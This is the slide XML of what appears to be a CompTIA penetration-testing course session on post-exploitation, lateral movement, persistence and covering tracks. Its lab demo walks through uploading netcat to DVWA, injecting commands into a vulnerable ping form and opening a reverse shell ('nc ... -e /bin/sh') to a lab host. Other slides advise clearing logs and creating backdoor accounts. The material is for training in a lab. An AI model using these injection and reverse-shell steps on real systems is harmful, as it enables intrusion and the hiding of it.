              <a:t>WMI - Windows Management Instrumentation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>WMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scheduled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PS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>remoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinRM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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>remoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMB - Server Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Block. Mostly Windows PCs but Linux using Samba too.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3.7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smtClean="0"/>
              <a:t>movement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RDP - Remote Desktop Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Desktop - Apple‘s Remote Desktop functionality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VNC - Virtual Network Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-server forwarding - X-windows/X-server is the GUI of Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Telnet - Standard insecure Telnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH - Secure Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RSH/Rlogin - Remote Shell / Remote login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 and command injection demos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08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set up for this demonstration, you must first use the Firefox browser on the Kali Linux VM to visit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://192.168.13.251/dvwa/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Login with admin/password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>DVWA Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  button (scroll down, it is lower on side menu).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change the drop-down menu on this page to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and click Submit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on the DVWA side menu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using this form, upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from /bin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login to the Metasploitable2 VM using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, then issue the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You will see the file was successfully uploaded, but has the wrong permissions and is not executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>------- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now visit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Command Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page. This page provides a ping command that is vulnerable to command injection.  Enter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>192.168.13.13;chmod 755 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc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using a Terminal on Kali Linux, s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>et up a listener using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 10000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 using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Command Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enter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192.168.13.13;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  10.1.1.250 10000 -e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh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And submit the form.  You should see a connection established.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3.7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Scheduled jobs and tasks - using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or Task Manager</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Daemons - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a background process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for the purpose of handling periodic service requests that a computer system expects to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>receive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Back doors - is a means to access a computer system or encrypted data that bypasses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system's standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- (or Trojan horse) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a type of malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>employed by cyber-thieves and hackers trying to gain access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a users system.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user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>creation - what could be better persistence than creating your own (super user?) account for later access?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Exploits – Domain 3.7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Covering your </a:t>
            </a:r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Removing any unneeded files or tools that were added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hiding other files and resources in hidden or uncommon locations such as a folder beginning with a . on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cleaning up traces of our activities in various log files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretty much anything to cover up what we have done and hide what we have left behind…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else might we cover our tracks as pen testers?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202011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class!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Recreate either of the demos from tonight’s session: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Create a Windows VM and see if you can perform the hack to be able to add an admin user.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Recreat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e the steps shown in the second demo to set up a reverse shell between your Kali Linux VM and the Metasploitable2 VM.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6717711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05/29/2018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Introduction: CompTIA program information, Tech review (Labs, GNS3 Project, &amp; VMs), and Planning and Scoping I.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05/31/2018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Planning and Scoping II: Penetration testing engagement scoping and compliance-based assessments.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06/05/2018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Information Gathering: Scanning, enumerating and the many other means of information gathering.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Vulnerability Identification: Vulnerability scanning and analysis to prepare for exploitation.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06/12/2018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I: Social engineering attack types and physical security.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II: Network-based, wireless &amp; RF-based, and application vulnerabilities.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07219" y="158916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03971" y="208204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20179" y="259437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26659" y="307753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13683" y="348285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20163" y="389791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475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Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools I - Domains 4.1, 4.2, and 4.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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All the Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mainly using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VM for this session.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Next Class!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8871A-7EC4-422F-B574-F7F4DD06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time: Please type your questions in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932317-8DEF-4BD5-9BC7-CDD8A320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over content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Share you experience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would you like to see </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different moving forward?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934BE8-FA3C-435A-807A-87738D7D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1440A530-B47F-4A69-A514-B87BCACE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32" y="1536076"/>
            <a:ext cx="4762500" cy="222885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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C104D42-D1E7-4F57-8F57-E53F5E5A36D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121199" y="3764926"/>
            <a:ext cx="4657725" cy="585618"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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3FC931-BD16-4F6F-911B-437FAFD2F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243137" y="3803269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Let’s keep the going on LinkedIn in the CompTIA Instructor Forum: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bit.ly/2wMU4nL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4816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887436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III: Local host vulnerabilities and post-exploitation techniques.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06/28/2018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I: Using and analyzing output from Nmap, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Netcat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> and other penetration testing tools and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>utilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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II: Programming and scripting overview (BASH, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>PowerShell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, Python &amp; Ruby).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I: Report writing and handling best practices, and the importance of communications.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II: Recommending mitigation strategies and other post-report activities.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Wrap up: Final review, demos, and best practices as well as CompTIA wrap up information and survey.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2274BE-9EA5-4C31-A5F4-AF666394746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607219" y="1521067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1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Lee McWhorter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Instructor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Lead Author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Woz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> U Cyber Security Program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lee@mcwhortertechnologies.com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9796" y="1181152"/>
            <a:ext cx="1777004" cy="17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7881" y="354079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31071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2859" y="1200151"/>
            <a:ext cx="2540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 Review – Mid Term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questions from the first six sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some new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20 seconds on each question!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ready?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3746</TotalTime>
  <Words>3456</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>492</Paragraphs>
  <Slides>61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Housekeeping</vt:lpstr>
      <vt:lpstr>Take Control of Your Console</vt:lpstr>
      <vt:lpstr>Welcome to the Train-the-Trainer Series</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Welcome</vt:lpstr>
      <vt:lpstr>Lightning Round Review – Mid Term</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL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Attacks and Exploits – Domain 3.5</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.6</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.6</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.6</vt:lpstr>
      <vt:lpstr>Chat Question</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.6</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.7</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.7</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.7</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.7</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.7</vt:lpstr>
      <vt:lpstr>Chat Question</vt:lpstr>
      <vt:lpstr>Homework for next class!</vt:lpstr>
      <vt:lpstr>Next Class!</vt:lpstr>
      <vt:lpstr>Discussion time: Please type your questions in chat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Lee</cp:lastModifiedBy>
  <cp:revision>254</cp:revision>
  <cp:lastPrinted>2013-07-30T16:42:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-23T08:11:58Z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